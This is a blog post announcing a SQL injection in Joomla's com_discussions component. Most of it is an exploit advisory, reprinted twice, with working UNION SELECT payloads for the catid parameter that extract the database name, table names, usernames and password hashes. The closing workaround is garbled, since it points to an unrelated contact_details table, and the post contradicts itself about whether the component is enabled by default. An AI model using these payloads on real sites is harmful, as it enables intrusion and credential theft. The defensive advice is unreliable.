ZERO-DAY JOOMLA EXPLOIT IN THE WIDE
New SQL injection exploit have been published targeting Joomla CMS, the Red Security TEAM have made the exploit available and allow to have database name or check all tables name also you can have the database users login and different user passwords.
The vulnerability exists in the discussion component of Joomla (com_discussions) that exist by default in any CMS, but the webmaster may activate this component for having the discussion enabled on website.
[php]
#
# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author : Red Security TEAM
# Date : 17/01/2012
# Risk : High
# Software : http://extensions.joomla.org/<wbr>extensions/communication/<wbr>forum/13560
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=[SQLi]
#
# Example :
#
# 1. [Get Database Name]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select concat(0x7e,0×27,unhex(Hex(<wbr>cast(database() as char))),0×27,0x7e)–+a
# 2. [Get Tables Name]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,count(table_name),0×27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)–+a
# 3. [Get Username]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,unhex(Hex(cast(jos_users.username as char))),0×27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) –+a
# 4. [Get Password]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,unhex(Hex(cast(jos_users.password as char))),0×27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) –+a
[/php]
#
# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author : Red Security TEAM
# Date : 17/01/2012
# Risk : High
# Software : http://extensions.joomla.org/<wbr>extensions/communication/<wbr>forum/13560
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=[SQLi]
#
# Example :
#
# 1. [Get Database Name]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select concat(0x7e,0×27,unhex(Hex(<wbr>cast(database() as char))),0×27,0x7e)–+a
# 2. [Get Tables Name]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,count(table_name),0×27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)–+a
# 3. [Get Username]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,unhex(Hex(cast(jos_users.username as char))),0×27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) –+a
# 4. [Get Password]
# http://target.com/index.php?<wbr>option=com_discussions&view=<wbr>thread&catid=1′ union all select (select concat(0x7e,0×27,unhex(Hex(cast(jos_users.password as char))),0×27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) –+a
[/php]
As this is a zero day their still no update or patch for this vulnerability but as a workaround It is recommended to modify the source code of the page "index.php" to examine the URL parameter “catid” in the #__contact_details table before being used in SQL queries.
Comments
Post a Comment